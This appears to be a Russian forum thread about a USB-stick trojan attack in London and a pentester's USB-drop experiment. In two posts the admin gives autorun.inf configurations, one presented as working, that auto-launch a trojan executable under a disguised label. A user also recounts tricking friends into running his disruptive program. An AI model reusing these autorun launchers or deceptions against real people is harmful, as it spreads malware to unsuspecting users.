Моддинг форум

[exeCM offline]

Русский вирус атаковал Лондон через халявные USB-флешки

USB-флешки, оставленные мошенниками на одной из парковок в Лондоне, содержали фишерский троян, который ворует банковские пароли незадачливых любителей втыкать в свой компьютер неизвестные устройства.



Об этом случае рассказал представитель Check Point во время выступления на выставке Infosec trade show. Однако он отказался раскрывать дальшейшую информацию о вирусе, сославшись на то, что это помешает расследованию, в котором он сейчас принимает участие. Специалист другой компании, F-Secure, уточнил, что троянский код использовал технику подменных е-мейлов - типичная техника жуликов для кражи личных данных пользователей.

Как отмечает The Register, банковские трояны продаются в основном на русских сайтах, по цене от 2 до 5 тыс. долларов. Две главные группы таких вирусописателей - Corpse и SE-Code - находятся в России, они торгуют троянами Haxdoor и Apophis. Другое популярное семейство банковских троянов - Torpig - тоже создано русскоязычным автором.

Эксперты "Вебпланеты" полагают, что в этот раз уважаемый The Register сильно перегнул свою палку, сваливая все проблемы на Россию. Техника заражения самоактивирующимся трояном через USB-драйвы была продемонстрирована еще летом прошлого года на другой выставке в Лондоне - IDG Endpoint Security show.

Более того: основатель американской компании Secure Network Technologies Стив Стасиуконис в июне прошлого года очень подробно описал в журнале Dark Reading собственный эксперимент по социальному взлому, который был проведен специально для демонстрации таких возможностей своим заказчикам: те очень интересовались, что еще может в будущем угрожать безопасности их сетей.

"В прошлом, мы использовали много других "социальных тактик" для взлома сети, - пишет Стасиуконис. - Мы тусовались с курильщиками, флиртовали с секретаршами, или захватывали переговорную, и входили в сеть. В этот раз нужно было сделать что-то другое. Среди сотрудников уже пошел слух, что кто-то будет тестировать безопасность, включая и проверку людей.

Мы поняли, что надо попробовать нечто новое. Мы собрали все USB-флешки, которые нам за эти годы бесплатно раздавали производители в качестве рекламы, и залили туда специальный софт. Я попросил одного нашего парня написать троян, который будет красть пароли и другую персональную информацию, и пересылать ее нам по е-мейлу.

Следущей задачей было распространение флешек среди сотрудников. Я отправился в компанию в 6 утра, пока там никого не было. А затем разбросал флешки на парковках, в курилках и других местах обитания скучающих офисных работников.

Потом я взял кофе и стал смотреть, как ведут себя жертвы, приходя на работу. Я был натурально в шоке, наблюдая реакции людей, которые находят флешку: они втыкали ее в свой компьютер буквально в ту же минуту, когда возвращались на рабочее место".

Далее специалист по безопасности рассказывает, сколько полезных данных для взлома сети было собрано благодаря трояну за 3 дня, и как его в очередной раз поразили результаты. Из 20 разбросанных флешек сотрудники компании нашли 15 - и все они были тут же вставлены в компьютеры.

Таким образом, нынешняя вирусная атака с помощью USB-халявы в Лондоне вполне может быть связана с "прекрасными примерами", которые подают западные эксперты по безопасности в своих хвастливых публикациях.

Источник: http://www.webplanet.ru/

[exeCM offline]

Блин, я то думал, что такое может только в России произойти. У нас то народ не грамотный в этом смысле. А это в Лондоне, В БАНКЕ!
Что думаете?

[Nighthorror offline]

exeCM, ну и что что в Лондоне и в банке ?)
Там что роботы работаю или сплошь трумегакулцхакеры и платиновые дипломники по IT безопастности. Люди они и в африке люди.

Вот тебе вручат на улице флешку - что будешь с ней делать ?).

[exeCM offline]

Nighthorror, для начала отрублю жестак от компа и воткну старый на 5 Гб. Затем форматну флэшку в NTFS, потом в FAT. Затем полное форматирование жестака с установкой Linux. Вотматирование из Linux. Опять форматирование жестаку, установка винды и финальное форматирование. После проверка флэшки всеми возможными антивирусами и антитроянами с последними обновлениями.
И мона флэшку юзать :wink:

[Forum admin]

для начала отрублю жестак от компа и воткну старый на 5 Гб. Затем форматну флэшку в NTFS, потом в FAT. Затем полное форматирование жестака с установкой Linux. Вотматирование из Linux. Опять форматирование жестаку, установка винды и финальное форматирование. После проверка флэшки всеми возможными антивирусами и антитроянами с последними обновлениями.
И мона флэшку юзать :wink:

Одеяло убежало, улетела простыня. И подушка, как лягушка ускакала от меня.
Я за свечку - свечка в печку. Я за книжку - та бежать...
Больше анашу такую я не буду покупать!

[exeCM offline]

Forum admin, :lol: :lol: развесилил, тока это к чему??

[Forum admin]

exeCM, да к тому что зачем такие извращения? От того что ты воткнешь флешку в USB порт ни один троян к тебе не проникнет.

Можно даже ее не форматировать, достаточно удалить файл с трояном или просто не запускать его.

[exeCM offline]

Forum admin, ну да, если его на флэшке нет.

Техника заражения самоактивирующимся трояном через USB-драйвы была продемонстрирована еще летом прошлого года на другой выставке в Лондоне - IDG Endpoint Security show.

Самоактивирующийся троян! Хорошо, что троян пишется под конкретную платформу и в другой среде работать не будет.

[Forum admin]

exeCM, Да это написали для дилетантов.
Ты "автозагрузку" видел, когда втыкал в CD привод какой-нибудь диск с игрушкой. Тут тот же самый принцип.

В корень флешки брось файл autorun.INF

а в нем пишешь:

Код:
[AutoRun]
Open=\путь\к\autorun.exe
Icon=\путь\к\иконке.ico
если у тебя не EXE то вместо Open - shellexecute
т.е.

Код:
shellexecute=\путь\к\файлу


Отключить функцию автозагрузки - одна секунда. И все юзай флешку как тебе нравится, никакого изврата не нужно.

[exeCM offline]

Ты "автозагрузку" видел, когда втыкал в CD привод какой-нибудь диск с игрушкой.

Не только видел но и делал очень много раз, чем собственно сейчас и занимаюсь.
Ты вообщето прав, тока я не пойму, чтож они не могли подумать о последствиях, о том, что на флэшке вирус??

[Князь offline]

Волнует другое:из-за таких чайников страдает огромное колличество людей.Какой-нибудь человек копит деньги, чтоб купить какую-нибудь вещь,а одна любопытная варвара,которая нефиг делать на работе, даёт доступ к этому счёту другим людям.Мне реально жалко таких вкладчиков.Понаберут всяких умников и потом конечно,любая фигня может систему грохнуть.

[Forum admin]

exeCM, людям свойственно совершать не обдуманные поступки.

Вот правильный код, который точно работает, если его прописать в авторун.инф (взял с хакер.ру):

[autorun]
UseAutoPlay=1
shellexecute=троян.ехе

action=Запустить
action=@троян.ехе
label=Крутой Троян
icon=троян.ехе
Shell\cmd1=Запустить
Shell\cmd1\Command = троян.ехе

[exeCM offline]

ОЙ-ой-ой, вот что бывает, если инет глючит, пишет, ошибку соединения или "сообщени не отправлено" :tratata: :tratata: :tratata:
Затрите плиз лишние.

Волнует другое:из-за таких чайников страдает огромное колличество людей.Какой-нибудь человек копит деньги, чтоб купить какую-нибудь вещь,а одна любопытная варвара,которая нефиг делать на работе, даёт доступ к этому счёту другим людям.Мне реально жалко таких вкладчиков.Понаберут всяких умников и потом конечно,любая фигня может систему грохнуть.

Согласен. Вот поэтому я хроню свои копейки не в банке, а дома под диваном. :wink:

[Forum admin]

Согласен. Вот поэтому я хроню свои копейки не в банке, а дома под диваном.

Ну твой IP я вижу, как нибудь надо будет нанести визит под диван :wink:

[exeCM offline]

Forum admin, код мне не важен. Единственной программой которую я написал (зловредную естественно) была прога, которая изменяла значения клавишь, т.е. при нажатии на любую клавишу клавы или мыши комп вырубался. Написанна она была от нечего делать за 15 минут. Потом раздал друзьям (а потом замаялся ходить к ним переставлять оси, ибо востанавливать значения клавиш, так еще с экранной клавиатуры :puke: ), причем делал по разному.
Одному записал на диск игрушку с автозапуском, причем через автозапуск моя прога и работала. Причем намеренно сказал, что игрушка вирусом страшным заражена. И ничего, взял и даже антивирем не проверил!
Другому кидал на флэху музыку и закинул мою прогу с именем Вирус.exe . Тот же результат.
Третьему по мейлу послал. Догадайтесь, что случилось.
Итог: люди вообще не шарют в компьютерной безопастности и/или пренебрегают ней.